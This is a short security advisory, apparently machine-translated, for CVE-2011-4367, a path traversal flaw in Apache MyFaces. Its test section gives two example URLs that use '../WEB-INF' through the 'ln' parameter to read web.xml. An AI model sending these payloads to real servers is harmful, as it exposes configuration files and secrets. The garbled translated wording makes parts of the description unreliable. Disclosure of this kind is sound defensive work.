Release date:
Updated on:
Affected Systems:
Apache Group MyFaces
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51939
Cve id: CVE-2011-4367
Apache MyFaces is an open-source implementation of the JavaServer Faces standard.
Apache MyFaces JSF allows. faces. the resource 'ln 'parameter has a relative path or write URL, so the resource name contains ".. this vulnerability can be exploited by remote attackers to obtain sensitive information.
<* Source: Paul niclucci
Link: http://seclists.org/fulldisclosure/2012/Feb/150
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/faces/javax.faces.resource/web.xml? Ln = ../WEB-INF
Http://www.example.com/faces/javax.faces.resource/web.xml? Ln = .. \ WEB-INF
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://httpd.apache.org/